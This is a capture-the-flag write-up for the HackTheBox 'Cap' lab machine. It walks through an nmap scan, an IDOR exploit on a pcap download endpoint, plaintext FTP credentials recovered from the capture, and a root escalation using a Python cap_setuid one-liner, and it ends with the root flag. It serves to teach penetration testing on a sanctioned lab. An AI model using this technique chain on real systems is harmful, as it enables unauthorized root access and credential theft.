July 5, 2026
CAP (HackTheBox Easy Machine)
How I pwned HackTheBox Cap using IDOR and a Python privilege escalation

By Eduardo Mafezoli
2 min read
About
Cap is an easy difficulty Linux machine running an HTTP server that performs administrative functions including performing network captures. Improper controls result in Insecure Direct Object Reference (IDOR) giving access to another user's capture. The capture contains plaintext credentials and can be used to gain foothold. A Linux capability is then leveraged to escalate to root.
Recon & Enumeration
I began using nmap to enumerate the services on the target.
sudo nmap -sC -sV 10.129.113.149 -Pn
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-04 15:01 -0400
Nmap scan report for 10.129.113.149
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.09 secondssudo nmap -sC -sV 10.129.113.149 -Pn
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-04 15:01 -0400
Nmap scan report for 10.129.113.149
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.09 secondsAfter using nmap I accessed the website for further enumeration.
I saw that the website has a data directory with a pcap downloadable file.
Since data/1/ doesn't have anything useful I tried an IDOR attack to find other data files.
The attack worked and I got data/0/ that is the admin pcap file.
User Flag
After downloading the file I enumerated using Wireshark.
Enumerating the FTP logs I discovered a credential.
nathan:Buck3tH4TF0RM3!nathan:Buck3tH4TF0RM3!After using the credentials on FTP I got the user.txt file.
Privilege Escalation
I used the credentials to log in on SSH service.
I enumerated the system for possible system privilege abuse and found that the standard SUID binaries were not vulnerable. However, I checked for Linux capabilities using:
getcap -r / 2>/dev/nullgetcap -r / 2>/dev/nullThe output revealed a critical misconfiguration:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eipThe cap_setuid capability allows Python to change the process UID to any user, including root (UID 0), without requiring a password.
I exploited this by executing:
python3.8 -c "import os; os.setuid(0); os.system('/bin/bash')"python3.8 -c "import os; os.setuid(0); os.system('/bin/bash')"I gained root access and retrieved the flag from /root/root.txt
dd7c13b92b4b64ff3c50f8b14005ec6ddd7c13b92b4b64ff3c50f8b14005ec6d